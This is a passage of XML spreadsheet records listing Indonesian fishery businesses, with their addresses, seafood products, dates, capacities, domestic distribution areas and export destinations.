    <s v="Kerupuk Ikan, Kerupuk Udang, Kerupuk Cumi-cumi, Kerupuk Kerang"/>
    <d v="2020-10-23T00:00:00"/>
    <n v="60000"/>
    <s v="Kabupaten Karimun, Kabupaten Bintan, Kabupaten Natuna, Kabupaten Lingga, Kabupaten Kepulauan Anambas, Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="22914"/>
    <x v="772"/>
    <s v="CV. KERAPU EMAS PAPUA"/>
    <s v="Jl. Kanal Victory Komplek Perindustrian, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Demersal Segar (Kerapu, Kakap)"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="1500"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Manado, Kota Makassar"/>
    <s v="Hong Kong, Singapore"/>
  </r>
  <r>
    <n v="22915"/>
    <x v="772"/>
    <s v="CV. KERAPU EMAS PAPUA"/>
    <s v="Jl. Kanal Victory Komplek Perindustrian, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Pelagis Segar (Tenggiri)"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="1500"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Manado, Kota Makassar"/>
    <s v="Hong Kong, Singapore"/>
  </r>
  <r>
    <n v="22916"/>
    <x v="145"/>
    <s v="PT. PAHALA BAHARI NUSANTARA"/>
    <s v="Kawasan Industri Karyadeka Pancamurni Kav B3, Kel. Pasirsari, Kec. Cikarang Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Beku (Cakalang)"/>
    <d v="2020-11-25T00:00:00"/>
    <n v="20000000"/>
    <s v="Kota Surabaya"/>
    <s v="Algeria, France, Italy, Japan, Mexico, Portugal, Spain, Thailand"/>
  </r>
  <r>
    <n v="22917"/>
    <x v="145"/>
    <s v="PT. PAHALA BAHARI NUSANTARA"/>
    <s v="Kawasan Industri Karyadeka Pancamurni Kav B3, Kel. Pasirsari, Kec. Cikarang Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tuna Beku"/>
    <d v="2020-11-25T00:00:00"/>
    <n v="10000000"/>
    <s v="Kota Surabaya"/>
    <s v="Algeria, France, Italy, Japan, Mexico, Portugal, Spain, Thailand"/>
  </r>
  <r>
    <n v="22918"/>
    <x v="773"/>
    <s v="UD. SINAR MAS"/>
    <s v="Jl. Vand Iskandar Baksir No.17, Kel. Jitra, Kec. Teluk Segara, Kota Bengkulu&lt;br&gt;Bengkulu"/>
    <n v="8"/>
    <s v="Ikan Demersal Beku (Layur, Bawal)"/>
    <d v="2020-11-16T00:00:00"/>
    <n v="5000000"/>
    <s v="Kota Padang, Kota Bengkulu, Kota Bandar Lampung, Kota Jakarta Pusat"/>
    <m/>
  </r>
  <r>
    <n v="22919"/>
    <x v="774"/>
    <s v="PT. LAUTAN SEJAHTERA MANDIRI"/>
    <s v="Pulau Bulang RT 005 RW 002, Kel. Batu Legong, Kec. Bulang, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Udang Segar"/>
    <d v="2021-05-06T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Batam"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="22920"/>
    <x v="145"/>
    <s v="PT. PAHALA BAHARI NUSANTARA"/>
    <s v="Kawasan Industri Karyadeka Pancamurni Kav. B3, Kel. Pasirsari, Kec. Cikarang Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tuna Loin Masak Beku"/>
    <d v="2020-11-25T00:00:00"/>
    <n v="3373011"/>
    <s v="Kota Surabaya"/>
    <s v="Algeria, France, Italy, Japan, Mexico, Portugal, Spain, Thailand, United States"/>
  </r>
  <r>
    <n v="22921"/>
    <x v="775"/>
    <s v="PT. SINAR LAUTAN TERPADU"/>
    <s v="Jl. Dermaga Muara Angke No.20, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22922"/>
    <x v="775"/>
    <s v="PT. SINAR LAUTAN TERPADU"/>
    <s v="Jl. Dermaga Muara Angke No.20, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22923"/>
    <x v="775"/>
    <s v="PT. SINAR LAUTAN TERPADU"/>
    <s v="Jl. Dermaga Muara Angke No.20, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Gabus Laut, Kembung, Lemadang, Marlin, Salem, Layaran, Layang, Cakalang, Tenggiri, Pedang)"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22924"/>
    <x v="775"/>
    <s v="PT. SINAR LAUTAN TERPADU"/>
    <s v="Jl. Dermaga Muara Angke No.20, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Segar (Lemuru, Tongkol, Kembung, Lemadang, Marlin, Layaran, Layang, Cakalang, Tenggiri, Pedang, Gabus Laut, Teri)"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22925"/>
    <x v="775"/>
    <s v="PT. SINAR LAUTAN TERPADU"/>
    <s v="Jl. Dermaga Muara Angke No.20, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Kakap, Swanggi, Gulama, Lencam, Sebelah, Manyung, Kuwe, Kerapu, Layur, Kakatua, Bawal, Selar, Baronang, Kuro, Kurisi)"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22926"/>
    <x v="775"/>
    <s v="PT. SINAR LAUTAN TERPADU"/>
    <s v="Jl. Dermaga Muara Angke No.20, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Segar (Swanggi, Gulama, Lencam, Sebelah, Manyung, Kuwe, Kerapu, Layur, Kakatua, Bawal, Selar, Kakap, Baronang, Kurisi)"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22927"/>
    <x v="775"/>
    <s v="PT. SINAR LAUTAN TERPADU"/>
    <s v="Jl. Dermaga Muara Angke No.20, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Rajungan Beku"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22928"/>
    <x v="775"/>
    <s v="PT. SINAR LAUTAN TERPADU"/>
    <s v="Jl. Dermaga Muara Angke No.20, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Rajungan Segar"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22929"/>
    <x v="775"/>
    <s v="PT. SINAR LAUTAN TERPADU"/>
    <s v="Jl. Dermaga Muara Angke No.20, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Beku"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22930"/>
    <x v="775"/>
    <s v="PT. SINAR LAUTAN TERPADU"/>
    <s v="Jl. Dermaga Muara Angke No.20, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Segar"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22931"/>
    <x v="775"/>
    <s v="PT. SINAR LAUTAN TERPADU"/>
    <s v="Jl. Dermaga Muara Angke No.20, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Pari Beku"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22932"/>
    <x v="775"/>
    <s v="PT. SINAR LAUTAN TERPADU"/>
    <s v="Jl. Dermaga Muara Angke No.20, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Pari Segar"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22933"/>
    <x v="775"/>
    <s v="PT. SINAR LAUTAN TERPADU"/>
    <s v="Jl. Dermaga Muara Angke No.20, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Hiu Beku"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22934"/>
    <x v="775"/>
    <s v="PT. SINAR LAUTAN TERPADU"/>
    <s v="Jl. Dermaga Muara Angke No.20, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Beku"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22935"/>
    <x v="775"/>
    <s v="PT. SINAR LAUTAN TERPADU"/>
    <s v="Jl. Dermaga Muara Angke No.20, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Segar"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22936"/>
    <x v="775"/>
    <s v="PT. SINAR LAUTAN TERPADU"/>
    <s v="Jl. Dermaga Muara Angke No.20, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Kipas Beku"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22937"/>
    <x v="775"/>
    <s v="PT. SINAR LAUTAN TERPADU"/>
    <s v="Jl. Dermaga Muara Angke No.20, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Kipas Segar"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22938"/>
    <x v="775"/>
    <s v="PT. SINAR LAUTAN TERPADU"/>
    <s v="Jl. Dermaga Muara Angke No.20, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Bandeng Beku"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22939"/>
    <x v="775"/>
    <s v="PT. SINAR LAUTAN TERPADU"/>
    <s v="Jl. Dermaga Muara Angke No.20, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Bandeng Segar"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22940"/>
    <x v="775"/>
    <s v="PT. SINAR LAUTAN TERPADU"/>
    <s v="Jl. Dermaga Muara Angke No.20, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22941"/>
    <x v="775"/>
    <s v="PT. SINAR LAUTAN TERPADU"/>
    <s v="Jl. Dermaga Muara Angke No.20, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Segar"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22942"/>
    <x v="775"/>
    <s v="PT. SINAR LAUTAN TERPADU"/>
    <s v="Jl. Dermaga Muara Angke No.20, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Lobster Beku"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22943"/>
    <x v="775"/>
    <s v="PT. SINAR LAUTAN TERPADU"/>
    <s v="Jl. Dermaga Muara Angke No.20, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Lobster Segar"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22944"/>
    <x v="50"/>
    <s v="PT. MARINDO MAKMUR USAHA JAYA"/>
    <s v="Jl. Muncul Industri II, Kel. Gedangan, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Asin Kering"/>
    <d v="2020-12-07T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22945"/>
    <x v="776"/>
    <s v="PT. TUNA INDONESIA MANDIRI"/>
    <s v="Jl. Yos Sudarso No.11, Kel. Klatak, Kec. Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-02-10T00:00:00"/>
    <n v="25000"/>
    <s v="Kabupaten Banyuwangi, Kabupaten Pasuruan, Kota Denpasar, Kabupaten Lombok Barat, Kabupaten Lombok Tengah"/>
    <s v="Japan, Thailand"/>
  </r>
  <r>
    <n v="22946"/>
    <x v="777"/>
    <s v="PT. BLUE OCEAN GRACE INTERNATIONAL"/>
    <s v="Kompleks Pelabuhan Perikanan Samudera Bitung, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Segar"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="65000"/>
    <m/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="22947"/>
    <x v="777"/>
    <s v="PT. BLUE OCEAN GRACE INTERNATIONAL"/>
    <s v="Kompleks Pelabuhan Perikanan Samudera Bitung, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Beku"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="Japan, United States"/>
  </r>
  <r>
    <n v="22948"/>
    <x v="778"/>
    <s v="CV. CTK"/>
    <s v="Jl. Gabion No. 99 Pelabuhan Perikanan Samudera Belawan, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Kuring, Aso-Aso, Lemuru, Tongkol, Salem, Selayang, Layang)"/>
    <d v="2021-01-04T00:00:00"/>
    <n v="900000"/>
    <s v="Kota Sibolga, Kota Medan, Kota Padang, Kota Pekanbaru, Kota Jambi, Kota Palembang, Kota Jakarta Utara"/>
    <s v="Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="22949"/>
    <x v="84"/>
    <s v="PT. MUTIARA LAUT ABADI"/>
    <s v="Jl. Pulau Buton KIM II Mabar, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kepiting Kulit Lunak Beku"/>
    <d v="2020-11-18T00:00:00"/>
    <n v="100"/>
    <m/>
    <s v="Australia, China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="22950"/>
    <x v="779"/>
    <s v="UD. EVI TENGGIRI"/>
    <s v="Jl. Teluk Serpang No.5, Kel. Sumber Jaya, Kec. Kampung Melayu, Kota Bengkulu&lt;br&gt;Bengkulu"/>
    <n v="8"/>
    <s v="Pempek Ikan"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Padang, Kota Lubuklinggau, Kota Bengkulu, Kota Bandar Lampung"/>
    <m/>
  </r>
  <r>
    <n v="22951"/>
    <x v="277"/>
    <s v="PT. MEDAN TROPICAL CANNING &amp; FROZEN INDUSTRIES"/>
    <s v="Jl. K. L. Yos Sudarso KM 10.5 Kawasan Industri Medan, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Masak Beku"/>
    <d v="2020-11-25T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="France, Germany, Netherlands"/>
  </r>
  <r>
    <n v="22952"/>
    <x v="277"/>
    <s v="PT. MEDAN TROPICAL CANNING &amp; FROZEN INDUSTRIES"/>
    <s v="Jl. K. L. Yos Sudarso KM 10.5 Kawasan Industri Medan, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Hasil Budidaya Beku (Patin, Nila)"/>
    <d v="2020-11-25T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Germany, Italy, Netherlands, Portugal, Singapore, Thailand"/>
  </r>
  <r>
    <n v="22953"/>
    <x v="145"/>
    <s v="PT. PAHALA BAHARI NUSANTARA"/>
    <s v="Kawasan Industri Karyadeka Pancamurni Kav B3, Kel. Pasirsari, Kec. Cikarang Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tuna Pouch"/>
    <d v="2020-11-25T00:00:00"/>
    <n v="7500"/>
    <s v="Kota Surabaya"/>
    <s v="Japan, Taiwan, Province of China, United States"/>
  </r>
  <r>
    <n v="22954"/>
    <x v="780"/>
    <s v="PT. ANEKA TUNA INDONESIA"/>
    <s v="Jl. Raya Surabaya Malang Km 38, Kel. Karangrejo, Kec. Gempol, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ekstrak Ikan"/>
    <d v="2020-12-10T00:00:00"/>
    <n v="700000"/>
    <s v="Kabupaten Sidoarjo, Kabupaten Sumenep"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22955"/>
    <x v="781"/>
    <s v="PT. DEHO CANNING COMPANY"/>
    <s v="Jl. Raya Madidir, Kel. Paceda, Kec. Madidir, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Kaleng"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="3000000"/>
    <s v="Kota Jakarta Pusat, Kota Bandung, Kota Surabaya"/>
    <s v="Japan, Timor-Leste"/>
  </r>
  <r>
    <n v="22956"/>
    <x v="781"/>
    <s v="PT. DEHO CANNING COMPANY"/>
    <s v="Jl. Raya Madidir, Kel. Paceda, Kec. Madidir, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Beku"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="21000000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22957"/>
    <x v="781"/>
    <s v="PT. DEHO CANNING COMPANY"/>
    <s v="Jl. Raya Madidir, Kel. Paceda, Kec. Madidir, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Loin Masak Beku"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="3000000"/>
    <m/>
    <s v="Thailand"/>
  </r>
  <r>
    <n v="22958"/>
    <x v="781"/>
    <s v="PT. DEHO CANNING COMPANY"/>
    <s v="Jl. Raya Madidir, Kel. Paceda, Kec. Madidir, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Loin Segar"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="210000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22959"/>
    <x v="781"/>
    <s v="PT. DEHO CANNING COMPANY"/>
    <s v="Jl. Raya Madidir, Kel. Paceda, Kec. Madidir, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Beku (Nike)"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="600000"/>
    <m/>
    <s v="France"/>
  </r>
  <r>
    <n v="22960"/>
    <x v="779"/>
    <s v="UD. EVI TENGGIRI"/>
    <s v="Jl. Teluk Serpang No.5, Kel. Sumber Jaya, Kec. Kampung Melayu, Kota Bengkulu&lt;br&gt;Bengkulu"/>
    <n v="8"/>
    <s v="Surimi Beku"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Padang, Kota Bengkulu, Kota Bandar Lampung"/>
    <m/>
  </r>
  <r>
    <n v="22973"/>
    <x v="782"/>
    <s v="POKLAHSAR PRIMA MELATI"/>
    <s v="Patemon RT 002 RW 001, Kel. Patemon, Kec. Bojongsari, Kabupaten Purbalingga&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Abon Ikan"/>
    <d v="2021-01-12T00:00:00"/>
    <n v="700"/>
    <s v="Kota Palembang, Kota Jakarta Selatan, Kabupaten Banyumas, Kabupaten Purbalingga, Kabupaten Bantul, Kabupaten Sleman, Kota Tangerang, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="22976"/>
    <x v="782"/>
    <s v="POKLAHSAR PRIMA MELATI"/>
    <s v="Patemon RT 002 RW 001, Kel. Patemon, Kec. Bojongsari, Kabupaten Purbalingga&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Otak-Otak Ikan, Bakso Ikan, Nugget Ikan)"/>
    <d v="2021-01-12T00:00:00"/>
    <n v="150"/>
    <s v="Kota Jakarta Pusat, Kota Bekasi, Kabupaten Banyumas, Kabupaten Purbalingga, Kota Semarang, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="22977"/>
    <x v="783"/>
    <s v="CV, AHUAT STAR"/>
    <s v="Jl, Jemadi Komplek Jumadi Permai No,1A, Kel, Pulo Brayan Barat II, Kec, Medan Timur, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Daging Kepiting Rebus Beku"/>
    <d v="2020-11-04T00:00:00"/>
    <n v="24000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="22993"/>
    <x v="147"/>
    <s v="PT. JAVA SEAFOOD"/>
    <s v="Desa Eretan Kulon, Kec. Kandang Haur, Kabupaten Indramayu&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cephalopoda Bernilai Tambah Beku (Cumi-cumi Berlapis Tepung, Naget Seafood)"/>
    <d v="2020-11-27T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Pusat"/>
    <m/>
  </r>
  <r>
    <n v="22994"/>
    <x v="784"/>
    <s v="CV. SUMBER REJEKI"/>
    <s v="Jl. Pangeran Ratu Pasar Induk Jakabaring A-1 RT 025 RW 009, Kel. 15 Ulu, Kec. Jakabaring, Kota Palembang&lt;br&gt;Sumatera Selatan"/>
    <n v="9"/>
    <s v="Ikan Pelagis Beku (Mata Besar, Tongkol, Makerel, Sarden)"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="540000"/>
    <s v="Kota Palembang"/>
    <m/>
  </r>
  <r>
    <n v="22995"/>
    <x v="785"/>
    <s v="RIZWAN EFFENDI "/>
    <s v="Kampung Bahari RT 12 RW 03, Kel. Sumber Jaya, Kec. Kampung Melayu, Kota Bengkulu&lt;br&gt;Bengkulu"/>
    <n v="8"/>
    <s v="Ikan Demersal Beku (Layur)"/>
    <d v="2020-11-25T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Bengkulu, Kota Bandar Lampung, Kota Jakarta Selatan"/>
    <m/>
  </r>
  <r>
    <n v="22996"/>
    <x v="785"/>
    <s v="RIZWAN EFFENDI "/>
    <s v="Kampung Bahari RT 12 RW 03, Kel. Sumber Jaya, Kec. Kampung Melayu, Kota Bengkulu&lt;br&gt;Bengkulu"/>
    <n v="8"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Sarden, Layang)"/>
    <d v="2020-11-25T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Pusat"/>
    <m/>
  </r>
  <r>
    <n v="22997"/>
    <x v="785"/>
    <s v="RIZWAN EFFENDI "/>
    <s v="Kampung Bahari RT 12 RW 03, Kel. Sumber Jaya, Kec. Kampung Melayu, Kota Bengkulu&lt;br&gt;Bengkulu"/>
    <n v="8"/>
    <s v="Ikan Pelagis Segar (Tongkol, Kembung, Sarden, Layang)"/>
    <d v="2020-11-25T00:00:00"/>
    <n v="500000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="23009"/>
    <x v="786"/>
    <s v="PT. MALUKU PRIMA MAKMUR"/>
    <s v="Dermaga Desa Laha, Kel. Laha, Kec. Teluk Ambon, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Tuna Segar"/>
    <d v="2020-10-27T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23010"/>
    <x v="787"/>
    <s v="CV. GOLDEN KK"/>
    <s v="Jl. Baru Tugu Adipura No.9, Kel. Paniki Bawah, Kec. Mapanget, Kota Manado&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Segar"/>
    <d v="2020-12-02T00:00:00"/>
    <n v="150000"/>
    <m/>
    <s v="Japan, Singapore"/>
  </r>
  <r>
    <n v="23011"/>
    <x v="787"/>
    <s v="CV. GOLDEN KK"/>
    <s v="Jl. Baru Tugu Adipura No.9, Kel. Paniki Bawah, Kec. Mapanget, Kota Manado&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Beku"/>
    <d v="2020-12-02T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="Japan, Singapore"/>
  </r>
  <r>
    <n v="23012"/>
    <x v="788"/>
    <s v="CV. SAYF ELHAQ"/>
    <s v="Dusun Damai Indah, Kel. Alue Dua, Kec. Langsa Baro, Kota Langsa&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Kepiting Kulit Lunak Beku"/>
    <d v="2020-12-21T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="23013"/>
    <x v="788"/>
    <s v="CV. SAYF ELHAQ"/>
    <s v="Dusun Damai Indah, Kel. Alue Dua, Kec. Langsa Baro, Kota Langsa&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Ikan Demersal Segar (Kerapu, Bawal, Kakap)"/>
    <d v="2020-12-21T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="23014"/>
    <x v="789"/>
    <s v="PERUSAHAAN UMUM PERIKANAN INDONESIA UNIT NATUNA"/>
    <s v="Kantor Perusahaan Umum Perikanan Indonesia Unit Natuna, Pelabuhan Perikanan Selat Lampa, Kel. Sabang Mawang Balai, Kec. Pulau Tiga, Kabupaten Natuna&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Jahan, Manyung, Anggoli, Kerapu, Kakap)"/>
    <d v="2020-11-26T00:00:00"/>
    <n v="35000"/>
    <m/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="23015"/>
    <x v="789"/>
    <s v="PERUSAHAAN UMUM PERIKANAN INDONESIA UNIT NATUNA"/>
    <s v="Kantor Perusahaan Umum Perikanan Indonesia Unit Natuna, Pelabuhan Perikanan Selat Lampa, Kel. Sabang Mawang Balai, Kec. Pulau Tiga, Kabupaten Natuna&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Beku (Anggoli, Kerapu, Kakap, Ekor Kuning)"/>
    <d v="2020-11-26T00:00:00"/>
    <n v="60000"/>
    <s v="Kota Jakarta Utara, Kota Semarang"/>
    <s v="China, Viet Nam"/>
  </r>
  <r>
    <n v="23016"/>
    <x v="789"/>
    <s v="PERUSAHAAN UMUM PERIKANAN INDONESIA UNIT NATUNA"/>
